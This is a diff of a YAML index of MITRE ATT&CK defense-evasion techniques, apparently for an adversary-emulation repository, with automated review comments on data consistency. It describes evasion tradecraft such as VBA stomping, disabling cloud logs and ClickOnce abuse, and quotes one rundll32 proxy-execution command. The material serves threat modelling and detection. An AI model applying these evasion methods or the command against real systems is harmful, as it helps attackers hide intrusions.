Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10638,7 +10779,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1027.003:
@@ -10694,11 +10834,10 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10722,11 +10861,10 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -10751,9 +10889,8 @@ defense-evasion:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -10833,7 +10970,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.009:
technique:
@@ -10867,7 +11003,7 @@ defense-evasion:
- source_name: LOLBAS Regasm
url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:55:48.725Z'
name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
description: |-
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -10894,8 +11030,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.009
atomic_tests: []
T1553.004:
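Review bot: for T1218.009 this hunk removes `x_mitre_attack_spec_version: 2.1.0` together with `spec_version` but adds nothing in its place, so no `x_mitre_attack_spec_version` remains visible for this technique, whereas every other entry touched by this patch either keeps 3.1.0 or is bumped to 3.2.0. Check whether the upstream object really lacks the field or whether the generator dropped it alongside `spec_version`.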
@@ -10990,48 +11124,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.004
atomic_tests: []
T1027.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
- type: attack-pattern
- created: '2020-03-16T15:30:57.711Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1027.004
- url: https://attack.mitre.org/techniques/T1027/004
- - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
- in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
- campaign. Retrieved November 29, 2018.'
- url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
- source_name: ClearSky MuddyWater Nov 2018
- - source_name: TrendMicro WindowsAppMac
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
- description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
- Info Stealer and Adware. Retrieved April 25, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-03T17:43:14.766Z'
name: 'Obfuscated Files or Information: Compile After Delivery'
description: |-
- Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+ Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor the execution file paths and command-line arguments
for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
suspicious behavior to reduce false positives from normal user and administrator
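Review bot: the new description line glues the citation onto the binary name without a space ('ilasm.exe(Citation: ATTACK IQ)'), unlike the other citations in the same sentence, and the unchanged `x_mitre_detection` text still names only csc.exe and GCC/MinGW as compilers to monitor even though the description now adds ilasm.exe. Both originate in the upstream ATT&CK text rather than this repository, but they are worth reporting upstream: detection guidance derived from this field would miss the compiler the description calls out.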
@@ -11040,9 +11150,14 @@ defense-evasion:
and execution frameworks like Mono and determine if they have a legitimate
purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
should only be used in specific and limited cases, like for software development.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Creation'
@@ -11054,12 +11169,35 @@ defense-evasion:
- Anti-virus
- Binary Analysis
- Static File Analysis
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Compiler software (either native to the system or delivered by the adversary)
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+ created: '2020-03-16T15:30:57.711Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/004
+ external_id: T1027.004
+ - source_name: ClearSky MuddyWater Nov 2018
+ description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+ in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+ campaign. Retrieved November 29, 2018.'
+ url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+ - source_name: ATTACK IQ
+ description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+ (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+ Binaries. Retrieved July 15, 2024.'
+ url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+ - source_name: TrendMicro WindowsAppMac
+ description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+ Info Stealer and Adware. Retrieved April 25, 2019.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1027.004
atomic_tests: []
T1564.007:
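Review bot: removing `x_mitre_permissions_required` for T1027.004 (the same happens for T1578.002 further down, while T1218.009 above still keeps `User`/`Administrator`) drops a field that consumers of this YAML may filter on; if upstream no longer emits it for current-version objects, a sentence in the commit message would let index and tooling owners stop relying on it. The added ATTACK IQ reference correctly pairs with the new `(Citation: ATTACK IQ)` in the description.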
@@ -11107,7 +11245,7 @@ defense-evasion:
url: https://github.com/decalage2/oletools
description: decalage2. (2019, December 3). python-oletools. Retrieved September
18, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T14:02:07.944Z'
name: VBA Stomping
description: |-
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11133,12 +11271,10 @@ defense-evasion:
x_mitre_system_requirements:
- MS Office version specified in _VBA_PROJECT
stream must match
host
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11228,7 +11364,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1127.001:
@@ -11286,12 +11421,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127.001
atomic_tests: []
T1656:
technique:
- modified: '2023-09-30T19:45:05.886Z'
+ modified: '2024-10-15T15:59:06.382Z'
name: Impersonation
description: "Adversaries may impersonate a trusted person or organization in
order to persuade and trick a target into performing some action on their
@@ -11333,10 +11467,9 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -11360,18 +11493,30 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.005:
technique:
- modified: '2023-10-02T22:17:54.968Z'
+ modified: '2024-09-25T14:15:26.322Z'
name: Modify Cloud Compute Configurations
- description: |-
- Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
- For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
- Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+ description: "Adversaries may modify settings that directly affect the size,
+ locations, and resources available to cloud compute infrastructure in order
+ to evade defenses. These settings may include service quotas, subscription
+ associations, tenant-wide policies, or other configurations that impact available
+ compute. Such modifications may allow adversaries to abuse the victim’s compute
+ resources to achieve their goals, potentially without affecting the execution
+ of running instances and/or revealing their activities to the victim.\n\nFor
+ example, cloud providers often limit customer usage of compute resources via
+ quotas. Customers may request adjustments to these quotas to support increased
+ computing needs, though these adjustments may require approval from the cloud
+ provider. Adversaries who compromise a cloud environment may similarly request
+ quota adjustments in order to support their activities, such as enabling additional
+ [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+ suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+ 2023) Adversaries may also increase allowed resource usage by modifying any
+ tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+ Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+ where cloud resources can be deployed, such as enabling [Unused/Unsupported
+ Cloud Regions](https://attack.mitre.org/techniques/T1535). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
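Review bot: the T1578.005 description switches from a `|-` block scalar to a double-quoted string with escaped `\n\n`, and the new value ends with a trailing space before the closing quote (`Cloud Regions](...). "`). The content change itself, dropping the Azure subscription-creation and subscription-hijacking paragraph and matched by the version bump to 2.0 in the following hunk, looks intentional, but the scalar-style change suggests the dumper's width or style settings differ from the previous run; pinning them and stripping trailing whitespace from string values before dumping would keep future diffs to real content changes.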
@@ -11385,7 +11530,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
type: attack-pattern
@@ -11397,20 +11542,11 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/005
external_id: T1578.005
- - source_name: Microsoft Subscription Hijacking 2022
- description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
- using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
- url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
- source_name: Microsoft Cryptojacking 2023
description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
Understanding and defending against cloud compute resource abuse. Retrieved
September 5, 2023.'
url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
- - source_name: Microsoft Peach Sandstorm 2023
- description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
- password spray campaigns enable intelligence collection at high-value targets.
- Retrieved September 18, 2023.
- url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
- source_name: Microsoft Azure Policy
description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
Retrieved September 5, 2023.
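Review bot: the two removed references (Microsoft Subscription Hijacking 2022 and Microsoft Peach Sandstorm 2023) are exactly the ones cited by the paragraph removed from the description in the earlier hunk, so this is consistent; a quick search of the file for those two citation keys would confirm no other `(Citation: ...)` still points at them.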
@@ -11419,11 +11555,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.008:
technique:
- modified: '2024-04-12T21:13:56.431Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Impair Defenses: Disable Cloud Logs'
description: |-
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -11432,6 +11567,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
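Review bot: for T1562.008 `x_mitre_attack_spec_version` is moved up into alphabetical position here (and `x_mitre_modified_by_ref` in the `@@ -11452` hunk), with the old trailing copies removed in the `@@ -11503` hunk, whereas T1027.004 and T1578.002 in this same patch keep these keys at the end of the object. The generator evidently preserves upstream key order; sorting keys when dumping would make diffs reflect content rather than ordering.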
@@ -11441,6 +11577,7 @@ defense-evasion:
- Janantha Marasinghe
- Matt Snyder, VMware
- Joe Gumke, U.S. Bank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
for: StopLogging
and DeleteTrail
.(Citation: Stopping
@@ -11452,13 +11589,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- - Office 365
- x_mitre_version: '2.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'User Account: User Account Modification'
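Review bot: `Google Workspace`, `Azure AD` and `Office 365` are replaced by `Office Suite` and `Identity Provider` in `x_mitre_platforms`; anything that selects techniques by the old platform strings (per-platform index files, filters in tooling) will no longer match T1562.008 and should be regenerated in the same change so the indexes do not drift from this file.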
@@ -11503,9 +11640,6 @@ defense-evasion:
url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.008
atomic_tests: []
T1564.003:
@@ -11588,18 +11722,140 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.003
atomic_tests: []
+ T1127.002:
+ technique:
+ modified: '2024-10-17T18:50:41.474Z'
+ name: ClickOnce
+ description: |-
+ Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+ Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+ ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+ Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+ Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Wirapong Petshagun
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Metadata'
+ - 'Module: Module Load'
+ x_mitre_system_requirements:
+ - ".NET Framework"
+ type: attack-pattern
+ id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+ created: '2024-09-09T14:39:28.637Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1127/002
+ external_id: T1127.002
+ - source_name: LOLBAS /Dfsvc.exe
+ description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+ - source_name: Microsoft Learn ClickOnce
+ description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+ Retrieved September 9, 2024.
+ url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+ - source_name: SpectorOps Medium ClickOnce
+ description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+ (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+ url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+ - source_name: NetSPI ClickOnce
+ description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+ Love Story. Retrieved September 9, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+ - source_name: Burke/CISA ClickOnce Paper
+ description: William J. Burke IV. (n.d.). Appref-ms Abuse for Code Execution
+ & C2. Retrieved September 9, 2024.
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+ - source_name: Burke/CISA ClickOnce BlackHat
+ description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+ IN: When .appref-ms abuse is operating as intended. Retrieved September
+ 9, 2024.'
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1070.010:
+ technique:
+ modified: '2024-10-13T15:48:46.391Z'
+ name: Relocate Malware
+ description: |-
+ Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+ Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+ Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Matt Anderson, @nosecurething, Huntress
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+ created: '2024-05-31T11:07:57.406Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/010
+ external_id: T1070.010
+ - source_name: Latrodectus APR 2024
+ description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+ (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+ 31, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+ - source_name: DFIR Report Trickbot June 2023
+ description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+ Retrieved May 31, 2024.
+ url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
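Review bot: in the new T1127.002 entry both Burke/CISA reference URLs carry Google Analytics tracking parameters (`?_gl=...&_ga=...`) that should not be persisted in a data file; the part before the `?` is the canonical PDF link. The same two references also name the author inconsistently ('William J. Burke IV' versus 'William Joseph Burke III'), and the T1070.010 Latrodectus reference has a stray space in 'Bytes Like Ice .'. All three come from the upstream STIX text and should be reported there, but trimming the query strings in the generator is harmless. Both new techniques land with `atomic_tests: []`, which is expected for an index regeneration.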
@@ -11632,10 +11888,9 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
@@ -11672,40 +11927,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.002:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
- type: attack-pattern
- created: '2020-05-14T14:45:15.978Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.002
- url: https://attack.mitre.org/techniques/T1578/002
